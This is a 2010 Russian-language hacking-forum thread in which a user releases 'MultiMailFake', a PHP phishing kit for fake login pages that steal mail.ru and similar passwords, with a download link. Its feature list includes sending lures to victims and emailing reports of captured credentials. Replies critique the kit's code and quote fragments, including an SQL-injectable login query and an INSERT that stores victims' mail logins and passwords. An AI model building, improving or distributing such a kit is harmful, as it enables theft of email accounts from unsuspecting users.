 |
16.01.2010, 09:03
|
|
Постоянный
Регистрация: 05.01.2009
Сообщений: 684
С нами:
9130007
Репутация:
485
|
|
[MMF] - MultiMailFake
[MMF] 0.2
MMF - MultiMailFake.Скрипт служит,для создания Фейк сервисов,для кражи паролей от mail.ru\аналогов.
Возможности:
[+] -Регистрация пользователей\Личный кабинет(мульти режим)
[+] -Отправка Письма жертве прям из скрипта.(со втроенным примером)
[+] -Отправка отчетов пользователю на email(по желанию)
[+] -++ Изменен интерфейс.Местами переписан.
Вообщем пока, что скрипт простоват,но работает вполне отлично.
Писал для своего будущего сервиса,но потом желание пропало,да и дел по мимо него много.
А так как я за Опенсурс,то скрипты радушно выкладываю в паблик)
Код кривоват,но работает....
Просьба не писать комментарии,с текстом типа: а я бы сделал вот так ...
Так как мне ровно пофиг,как бы вы сделали.....
Скачать MMF 0.2
Последний раз редактировалось ReduKToR; 06.03.2010 в 10:02..
|
|
|
05.03.2010, 21:41
|
|
Постоянный
Регистрация: 05.01.2009
Сообщений: 684
С нами:
9130007
Репутация:
485
|
|
Нашел 15 минут свободного времени.Дописал.
Обновил первый пост.
|
|
|
|
05.03.2010, 22:52
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
С нами:
11278406
Репутация:
818
|
|
Привыкли писать скрипты на error_reporting(0);
Код:
Notice: A session had already been started - ignoring session_start() in C:\wamp\www\1\regi.php on line 59
Notice: Undefined variable: POST in C:\wamp\www\1\regi.php on line 63
Notice: Undefined variable: POST in C:\wamp\www\1\regi.php on line 64
Notice: Undefined variable: POST in C:\wamp\www\1\regi.php on line 65
Во вторых:
PHP код:
$login = mysql_real_escape_string($_POST['login']);
$password = $_POST['password'];
$query = "SELECT `id` FROM `users` WHERE `login`='{$login}' AND `password`='{$password}' LIMIT 1";
Логин обезопасил а пароль ненадо? Ну тогда лови скуль:
Любой логин и пароль:
Авторизация проходит.
Если чесно, не в обиду, скрипт УГ)))) После скули дальнейший код не смотрел, интерес пропал. |
|
|
|
06.03.2010, 10:04
|
|
Постоянный
Регистрация: 05.01.2009
Сообщений: 684
С нами:
9130007
Репутация:
485
|
|
Дебагнул...
Сообщение от b3
Если чесно, не в обиду, скрипт УГ))))
Ну давай напиши лучще... Где от тебя хоть один норм релиз?
только вечно и умеешь что обсирать..... |
|
|
|
06.03.2010, 12:07
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
1. Запросы = queries на английском. Базовые знания английского 
2. Пути статические. Например, я кинул скрипт в папку MMF, а после cмены настроек, например, редирект идет на /logi.php. Так же и с формой фейка.
3.
PHP код:
if (@$_GET['mod'] !== "logi" && @$_GET['mod'] !== "mail" && @$_GET['mod'] !== "test" && @
$_GET['mod'] !== "sett" && @$_GET['mod'] !== "delete" && @$_GET['mod'] !== "exit")
in_array ф-цию не просто так придумали
4.
PHP код:
!preg_match("/^[\d]+$/i",
$_GET['page'])
is_numeric - намного проще, быстрее, удобнее, легче.
5. Никогда еще не видел кода с переменными на транслите русского языка. |
|
|
|
06.03.2010, 12:18
|
|
Участник форума
Регистрация: 08.02.2009
Сообщений: 196
С нами:
9080952
Репутация:
127
|
|
Сообщение от mailbrush
Никогда еще не видел кода с переменными на транслите русского языка.
в большинсте пхп скриптах такое можно увидеть
|
|
|
|
06.03.2010, 15:41
|
|
Постоянный
Регистрация: 08.11.2008
Сообщений: 498
С нами:
9213376
Репутация:
278
|
|
mailbrush
я думаю нет смысла критиковать названия переменных, т.к. релиз бесплатный и выложен для того, чтобы исправить код, помочь.
имена переменный каждый задает так, как ему удобно.
есть смысл их критиковать, если скрипт выполнен на заказ, хотя ТСу ещё далеко для выполнения заказов.
|
|
|
|
06.03.2010, 16:07
|
|
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
С нами:
11278406
Репутация:
818
|
|
Ну давай напиши лучще... Где от тебя хоть один норм релиз?
только вечно и умеешь что обсирать.....
Мальчик не выёбуйся, когда тебе указывают на ошибки, а учись выслушать и вынести с этого пользу. Я не стал писать что ты быдла кодер, я сказал что идея скрипта УГ, но судя по всему и ты тоже Г... раз неможеш адекватно воспринять критику, держы быдлан:
файл regi.php:
Раскрытие путей через точку в сессии , исправление:
Нет проверки на занятость ника при регистрации:
Потому что быдло код:
PHP код:
$ch_login = strtolower($login);
$pass = $pass;
$sql = @mysql_query("SELECT * FROM `users` WHERE `login` = '".$ch_login."'");
if(mysql_num_rows($sql) > 0)
{
echo'Аккуант с таким логином уже зарегистрирован!<br /><br />';
}
Неработает, догадайся почему.
PHP код:
elseif($email and !preg_match("#^[_\.0-9a-z-]+@([0-9a-z][0-9a-z-]+\.)+[a-z]{2,6}$#", $email))
{
echo'Неверный формат email!<br /><br />';
}
Зачем ты делаеш конкатенацию строк, если используеш двойные ковычки?
PHP код:
mysql_query("INSERT INTO `$db_name`.`users` (`login` ,`password` ,`email`) VALUES ('".$_POST."', '".$_POST."', '".$_POST."');");
ЗЫ Ты юморист
Index.php
Скуль не закрыта:
PHP код:
$login = mysql_real_escape_string($_POST['login']);
$password = $_POST['password'];
$query = "SELECT `id` FROM `users` WHERE `login`='{$login}' AND `password`='{$password}' LIMIT 1";
Конструкция:
PHP код:
$query = mysql_query("SELECT * FROM `users` ORDER BY `id` ASC");
$vsego = mysql_num_rows($query);
echo'<td class=border>Пользователей:'.$vsego.'</td><br>';
$query = mysql_query("SELECT * FROM `querys` ORDER BY `id` ASC");
$vsego = mysql_num_rows($query);
echo'<td class=border>Записей:'.$vsego.'</td>';
4 запросса!!! Хотя можно было бы:
Код:
SELECT count(*) FROM users UNION SELECT count(*) FROM querys;
Регулярки ето клёво, но не до такой степени:
PHP код:
if ( !isset($_GET['page']) or empty($_GET['page'])
or $_GET['page'] < 0 or !preg_match("/^[\d]+$/i",$_GET['page']) )
$show = 0;
Кстати /^[\d]+$/i модификатор i жжот в проверке на число.
Воощем в итоге я запутался в твоей писанине, непонятно зачем ты продублировал регистрацию еще и в файле logi.php
Вот еще гавнокод без проверок, делай что хочеш, просто мего сервис по тренировке хацкеров.
PHP код:
$query = "INSERT INTO querys(user, time, query, referer, ip, user_agent, maillogin, mailpass)
VALUES('".$login1."','".$time."','".$in_ip."','".$reftext."','".$ip."','".$otherinf."','".$login."','".$password."')";
mysql_query($query);
Вот ета часть кода у меня не заработала:
Я заменил на если ты не против.
Далее:
Код:
Warning: strtr() expects at least 2 parameters, 1 given in C:\wamp\www\1\auth.php on line 42
И вот что-то сфейлил:
Код:
Fatal error: Call to undefined function mailenc() in C:\wamp\www\1\auth.php on line 43
Там еще файл какой-то пытался скрипт открыть, но не нашел его:
PHP код:
$maillist = file("baza.txt");
Че за файл? Ридми нету, телепаты в отпуске.
Вообщем сил больше нету, в этом "коде" можно коментировать практически каждую 2-ю строку "кода".
Ну давай напиши лучще... Где от тебя хоть один норм релиз?
только вечно и умеешь что обсирать.....
Во-первых мне некогда писать подобные релизы, хотя я бы писал с удовольствием, но у меня нет времени, мне приходится работать, т.к. возраст 24 года. Во-вторых ты не видел все мои релизы, поетому не тебе судить. В третих я не обсираю, я указываю на ошибки, если ты в каждом критикуюшем видеш патенциального врага ето твои проблемы/комплексы.
|
|
|
|
06.03.2010, 16:12
|
|
Постоянный
Регистрация: 08.11.2008
Сообщений: 498
С нами:
9213376
Репутация:
278
|
|
b3, хороший анализ. В дополнениях не нужнается, т.к. действительно, слишком кривой код.
Исправь:
Я заменил на
if($row['mail_status'] == 1){
Последний раз редактировалось Deathdreams; 06.03.2010 в 16:15..
|
|
|
|
06.03.2010, 16:35
|
|
Постоянный
Регистрация: 05.01.2009
Сообщений: 684
С нами:
9130007
Репутация:
485
|
|
и так что мы имеем.
Из всего выше описаного я нашел толлько 1 неработающую хрень с опправкой отчетов на мыло, это то что я забыл поставить =
а остальное мое желание и мелкие недоделки.
вообщем разработка всеравно заморожена.кому нужно будет - доделает.
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
